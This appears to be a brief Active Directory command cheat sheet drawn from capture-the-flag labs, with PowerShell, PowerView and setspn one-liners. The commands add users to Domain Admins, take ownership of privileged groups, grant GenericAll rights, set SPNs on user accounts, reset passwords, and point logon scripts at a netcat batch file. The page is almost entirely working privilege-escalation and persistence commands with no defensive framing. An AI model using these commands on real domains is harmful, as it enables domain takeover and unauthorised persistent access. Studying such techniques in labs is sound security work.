Active Directory Commands

Common Active Directory operations, each shown with several different tools.

setadpassword

# MS AD Module
Set-ADAccountPassword -Identity smith -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)

setadattribute

# MS AD Module
Set-ADUser maria -ScriptPath "C:\programdata\pc.bat"
Set-ADUser ShriyaB -replace @{'extensionAttribute1' = 'demo text'}
Set-ADUser -Identity maria -ServicePrincipalNames @{Add='MSSQLSvc/object.local:1433'}

# MS setspn.exe
setspn -a MSSQLSvc/object.local:1433 object.local\maria

# Powerview.ps1 Module
Set-DomainObject -Identity maria -Set @{scriptpath = "C:\programdata\nc.bat"}

AddAdGroupMember

# MS AD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members maria

# Powerview.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

# Samba net (apt install samba); "group members" lists the group's current members
net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb

SetAdObjectOwner

# MS AD Module
$user = new-object system.security.principal.ntaccount("htb.local\tom")
Get-ADGroup -filter 'name -like "Backup Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'

AddACLRights

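# MS AD Module
$user = New-Object System.Security.Principal.NTAccount("object\maria")
# ActiveDirectoryAccessRule lives in System.DirectoryServices; GenericAll is the AD right for full control
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($user, [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, [System.Security.AccessControl.AccessControlType]::Allow)
Get-ADGroup -Filter 'name -like "Domain Admins"' | foreach { $acl = Get-Acl -Path "AD:$($_.DistinguishedName)"; $acl.AddAccessRule($ace); Set-Acl -Path "AD:$($_.DistinguishedName)" $acl }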

# Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Backup_Admins" -PrincipalIdentity claire -Rights All

Last updated 1 year ago
